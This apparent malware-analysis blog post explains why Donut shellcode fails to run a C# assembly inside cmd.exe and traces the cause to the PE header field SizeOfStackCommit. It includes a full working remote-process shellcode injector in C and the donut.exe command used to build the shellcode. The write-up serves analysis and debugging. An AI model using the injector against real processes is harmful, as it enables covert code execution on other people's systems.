Malware Analysis Series 1 — Will Donut’s generated shellcode ever fail?
Introduction
In a recent malware sample that we analysed, the malware unpacked Donut [1] shellcode and injected it into an existing running process. During the analysis, we did not have a copy of that process’s executable, as it existed only on the target machine. To continue with our analysis, we simply renamed cmd.exe to the injected process name and executed it for the malware to inject into. However, the Donut shellcode failed to execute the embedded C# assembly. In this article, we document our journey in understanding why it failed and how a particular field in the PE optional header, SizeOfStackCommit, can affect the injection of any C# payload into an unmanaged process.
Our “Malware”
Due to “confidentiality reasons”, we wrote a small shellcode injection program that mimics the malware’s behaviour of injecting shellcode into another process.
#include <stdio.h>
#include <stdlib.h>   // atoi, malloc
#include <Windows.h>

int main(int argc, char* argv[], char* envp[])
{
    if (argc != 3) {
        printf("Insufficient input\nEnter in the following format:\n\t%s <PID> <Shellcode Path>\n", argv[0]);
        return 2;
    }

    // OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE
    HANDLE remote_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)atoi(argv[1]));
    if (remote_handle == NULL) {
        printf("Invalid PID supplied or insufficient privilege\n");
        return 1;
    }

    HANDLE file_handle = CreateFileA(argv[2], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file_handle == INVALID_HANDLE_VALUE) {
        printf("No such file or invalid path\n");
        return 3;
    }

    // Read the whole shellcode file into a local buffer
    LARGE_INTEGER struct_filesize;
    GetFileSizeEx(file_handle, &struct_filesize);
    DWORD filesize = (DWORD)struct_filesize.QuadPart;
    void* filecontent = malloc(filesize);
    DWORD fileBytesRead = 0;
    if (filecontent != NULL) {
        ReadFile(file_handle, filecontent, filesize, &fileBytesRead, NULL);
    }
    if (fileBytesRead != filesize) {
        printf("Did not read the whole file or error in reading file\n");
        printf("Filesize is %lu and bytes read is %lu\n", filesize, fileBytesRead);
        return 4;
    }
    printf("Shellcode filesize (handle %p) is %lu bytes\n", file_handle, filesize);

    // Allocate memory for the shellcode in the target process
    void* remote_addr = VirtualAllocEx(remote_handle, NULL, filesize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (remote_addr == NULL) {
        printf("Unable to allocate memory in remote process\n");
        return 6;
    }
    printf("Allocated address is %p\n", remote_addr);

    // WriteProcessMemory reports the number of bytes written as a SIZE_T
    SIZE_T remoteBytesWritten = 0;
    WriteProcessMemory(remote_handle, remote_addr, filecontent, fileBytesRead, &remoteBytesWritten);
    printf("Written %zu bytes to %p in remote process\n", remoteBytesWritten, remote_addr);
    if (remoteBytesWritten != fileBytesRead) {
        printf("Unable to write full shellcode into remote process\n");
        return 5;
    }

    // Start a thread in the target process at the beginning of the shellcode
    HANDLE remote_thread = CreateRemoteThreadEx(remote_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_addr, NULL, 0, NULL, NULL);
    printf("Remote thread started with handle %p\n", remote_thread);
    return 0;
}
C# payload and Donut shellcode
For demonstration purposes, our C# payload simply launches notepad.exe once the assembly is successfully executed in the .NET runtime.
using System.Diagnostics;
using System.Threading;

namespace SimpleAppLauncher
{
    class Program
    {
        static void Main(string[] args)
        {
            // Visible side effect that proves the assembly ran
            Process.Start("notepad.exe");
            // Keep the thread alive afterwards
            while (true) { Thread.Sleep(1000000); }
        }
    }
}
To generate the Donut shellcode, we download the compiled donut.exe from the GitHub repository [1] and run donut.exe -i <PATH to compiled C# executable>, which generates loader.bin.
Injection outcome
In this post, we demonstrate injecting the Donut shellcode into two different processes:
- taskmgr.exe
- cmd.exe
When injected into taskmgr.exe, the Donut shellcode successfully set up the .NET environment for the C# assembly to execute, creating a new child process, notepad.exe. However, this was not the case for injection into cmd.exe. The injector output showed that the injection itself succeeded, but the shellcode did not execute successfully. We therefore set out to find why it failed to execute in a different process.
Debugging the shellcode
To find out what is happening, we first attach WinDbg to cmd.exe, which suspends the process, before running our ShellcodeInjector.
Next, we inject our Donut shellcode into the cmd.exe process and take note of the allocated address. Once we know the address of the memory allocated for the shellcode, we can set a break-on-access breakpoint on it (WinDbg’s ba command).
Since Donut is an open-source project, we could match what we saw in the debugger against its source and pinpoint that the call to CreateDomain failed, which caused the Donut shellcode to exit prematurely (https://github.com/TheWover/donut/blob/master/loader/inmem_dotnet.c#L113C1-L113C45). Based on the MSDN documentation [2], there are two exceptions that can be thrown by this function: ArgumentNullException and PlatformNotSupportedException. However, we are sure that the argument we provided is not NULL and that the platform we are testing on is supported.
Therefore, we had to dive deeper with WinDbg to determine exactly which exception was thrown. Using the SOS Debugging Extension, the !pe command revealed that it was an OutOfMemoryException, which is strange. From here onwards, we have to look into the CreateDomain function to determine why it triggers this exception for cmd.exe but not for taskmgr.exe.
Tracing the exception
System.AppDomain.CreateDomain
|__ System.AppDomain.InternalCreateDomain
    |__ System.AppDomain.InternalCreateDomain
        |__ AppDomainNative::CreateDomain
            |__ AppDomainNative::CreateDomainHelper
                |__ AppDomain::CreateUnmanagedObject
                    |__ AppDomain::CreateAdUnloadWorker <-- Throws OutOfMemoryException
In our attempt to trace the exception, we found that CreateAdUnloadWorker throws the OutOfMemoryException. CreateAdUnloadWorker is called to create a worker thread that handles AppDomain unloads [3]. To connect the dots, CreateAdUnloadWorker calls clr!Thread::CreateNewThread, which fails, and hence it throws the OutOfMemoryException.
AppDomain::CreateAdUnloadWorker
|__ clr!SetupUnstartedThread
|__ clr!Thread::CreateNewThread <-- Failed to create new thread
    |__ clr!RevertIfImpersonated
    |__ clr!Thread::CreateNewOSThread [4] <-- Failed to create OS thread
        |__ clr!Thread::CheckThreadStackSize [5]
            |__ clr!Thread::GetProcessDefaultStackSize
            |__ clr!ThreadWillCreateGuardPage [6] <-- Returns false causing the failure to create OS thread
Tracing into the calls made by CreateNewThread, we ultimately reach the function ThreadWillCreateGuardPage, which returns false. This causes the entire thread creation to fail, which in turn causes the creation of the AppDomain to fail.
Root Cause
The snippet of code for ThreadWillCreateGuardPage (obtained from [6]) is shown below:
BOOL ThreadWillCreateGuardPage(SIZE_T sizeReservedStack, SIZE_T sizeCommittedStack)
{
    SYSTEM_INFO sysInfo;
    ::GetSystemInfo(&sysInfo);
    return (sizeReservedStack > sizeCommittedStack + ((size_t)sysInfo.dwPageSize));
} // ThreadWillCreateGuardPage
The function returns false when sizeReservedStack (1st parameter) is less than or equal to sizeCommittedStack (2nd parameter) plus one page (sysInfo.dwPageSize). In this scenario, sizeReservedStack is always 0x80000, as it is hardcoded as the second parameter passed to CreateNewOSThread, while sizeCommittedStack is populated by the clr!Thread::GetProcessDefaultStackSize function.
In the case of the cmd.exe injection, sizeCommittedStack is observed to be 0xFC000 in the debugger. If we look at the PE header of cmd.exe, the value seen in the debugger matches SizeOfStackCommit in the optional header. Since 0xFC000 is already larger than the 0x80000 reservation, the check fails.
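To compare candidate target executables without attaching a debugger, the field can also be read straight from the file on disk. The sketch below is our own illustration and not part of Donut or the CLR: pe_size_of_stack_commit is a hypothetical helper that parses a PE image already loaded into a buffer, assuming the field offsets from the PE format specification (offset 76 in the PE32 optional header, offset 80 in the PE32+ one).

```c
#include <stddef.h>
#include <stdint.h>

/* Little-endian readers, so the sketch does not depend on host byte order. */
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const unsigned char *p) { return (uint32_t)rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static uint64_t rd64(const unsigned char *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }

/* Hypothetical helper: extracts SizeOfStackCommit from a PE image in memory.
   Returns 0 on success, -1 if the buffer does not look like a PE file. */
int pe_size_of_stack_commit(const unsigned char *buf, size_t len, uint64_t *commit)
{
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;

    size_t pe = rd32(buf + 0x3C);            /* e_lfanew: offset of "PE\0\0" */
    /* Need: signature (4) + file header (20) + first 88 bytes of optional header */
    if (pe > len || len - pe < 4 + 20 + 88)
        return -1;
    if (buf[pe] != 'P' || buf[pe + 1] != 'E' || buf[pe + 2] != 0 || buf[pe + 3] != 0)
        return -1;

    const unsigned char *opt = buf + pe + 4 + 20;   /* start of optional header */
    switch (rd16(opt)) {                            /* Magic */
    case 0x10B: *commit = rd32(opt + 76); return 0; /* PE32: 4-byte field  */
    case 0x20B: *commit = rd64(opt + 80); return 0; /* PE32+: 8-byte field */
    default:    return -1;
    }
}
```

Reading an executable into a buffer (for example with fread) and passing it to this helper should report the same value that the debugger shows as the second argument of ThreadWillCreateGuardPage.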
This is further confirmed when we debug the shellcode in taskmgr.exe, where we see 0x2000 as the second parameter passed to clr!ThreadWillCreateGuardPage. As the value of SizeOfStackCommit for taskmgr.exe is much smaller, the thread is able to create a guard page, and thus the AppDomain for the C# assembly can be created.
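The comparison can be replayed outside the debugger with the two committed sizes observed above. This is a minimal sketch in portable C rather than the CLR’s own code: the name will_create_guard_page is ours, and the page size is passed in explicitly and assumed to be 0x1000 (the usual value on x86/x64 Windows) instead of being queried with GetSystemInfo.

```c
#include <stddef.h>

/* Assumption: 4 KiB pages, the usual value on x86/x64 Windows. */
#define ASSUMED_PAGE_SIZE ((size_t)0x1000)

/* Stack reservation the article observed being passed as sizeReservedStack. */
#define OBSERVED_RESERVED_STACK ((size_t)0x80000)

/* Same comparison as ThreadWillCreateGuardPage, with the page size supplied
   by the caller so the sketch does not depend on the Windows API. */
int will_create_guard_page(size_t reserved, size_t committed, size_t page_size)
{
    return reserved > committed + page_size;
}
```

With the cmd.exe value, will_create_guard_page(OBSERVED_RESERVED_STACK, 0xFC000, ASSUMED_PAGE_SIZE) evaluates 0x80000 > 0xFD000, which is false. With the taskmgr.exe value, 0x2000, it evaluates 0x80000 > 0x3000, which is true. Under these assumptions, any SizeOfStackCommit of 0x7F000 or more would fail the check.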
Conclusion
This OutOfMemoryException applies to any kind of shellcode that attempts to create an AppDomain inside an executable with a large SizeOfStackCommit. As MSDN does not document this exception for CreateDomain, we hope this helps anyone out there who may be wondering why AppDomain creation fails even though the platform is supported and a valid string is passed to the function.
References
[1] https://github.com/TheWover/donut
[2] https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.createdomain?view=net-7.0
[4] https://github.com/dotnet/runtime/blob/main/src/coreclr/vm/threads.cpp#L2261
[5] https://github.com/dotnet/runtime/blob/main/src/coreclr/vm/threads.cpp#L2184